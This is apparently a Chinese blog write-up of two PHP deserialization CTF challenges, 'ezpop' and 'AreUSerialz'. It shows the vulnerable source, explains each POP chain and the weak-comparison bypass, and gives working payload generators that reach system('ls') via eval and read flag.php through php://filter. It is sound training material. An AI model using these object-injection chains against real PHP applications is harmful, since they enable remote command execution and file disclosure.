本文已参与「新人创作礼」活动,一起开启掘金创作之路。
2022DASCTF X SU 三月春季挑战赛ezpop
<?php
class crow
{
public $v1;
public $v2;
function eval() {
echo new $this->v1($this->v2);
}
public function __invoke()
{
$this->v1->world();
}
}
class fin
{
public $f1;
public function __destruct()
{
echo $this->f1 . '114514';
}
public function run()
{
($this->f1)();
}
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
}
class what
{
public $a;
public function __toString()
{
$this->a->run();
return 'hello';
}
}
class mix
{
public $m1;
public function run()
{
($this->m1)();
}
public function get_flag()
{
eval('#' . $this->m1);
}
}
if (isset($_POST['cmd'])) {
unserialize($_POST['cmd']);
} else {
highlight_file(__FILE__);
}
入口__destruct
f1=new what();
__toString中run()方法,两个类中都有
这里用mix中的run方法,然后crow里的__invoke到fin里的__call到mix里的get_flag
payload
<?php
class crow
{
public $v1;
public $v2;
public function __construct($v1)
{
$this->v1 = $v1;
}
}
class fin
{
public $f1;
public function __construct($f1)
{
$this->f1 = $f1;
}
}
class what
{
public $a;
public function __construct($a)
{
$this->a = $a;
}
}
class mix
{
public $m1;
public function __construct($m1)
{
$this->m1 = $m1;
}
}
$f = new mix("\nsystem('ls');");
$e = new fin($f);
$d = new crow($e);
$c = new mix($d);
$b = new what($c);
$a = new fin($b);
echo urlencode(serialize($a));
flag
flag{4d206c55-632f-430c-aeda-e60019260889}
not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but you are almost getting the flag!<?php
[网鼎杯 2020 青龙组]AreUSerialz
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}
简单看下,利用点在read方法,可以读取flag内容,因此我们需要进入read函数,比较重要的方法我们单独拿出来看
首先我们可以看到
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
如果我们想办法将op改为2,也会被强制改为1,但我们的目标是将2等于1
__destruct()魔术方法中,op==="2"是强比较,而process()使用的是弱比较op=="2",可以通过弱类型绕过,具体方法就是:op=2,这里的2是整数int类型,op=2时,op==="2"为false,op=="2"为true
这里还有一个考点:
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
由于protect类的成员在序列化的时候是以\00*\00作为标识符,但是会被下面的函数返回false而终止
绕过方法:
1.PHP7.1,对属性不敏感,public属性序列化不会出现不可见字符,可以用public属性来绕过
2.protected属性会引入\x00*\x00,在序列化内容中用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制表示。
采用第一种来构造
<?php
class FileHandler {
public $op = 2;
public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
public $content;
}
$a = new FileHandler();
$b = serialize($a);
echo $b;
?>
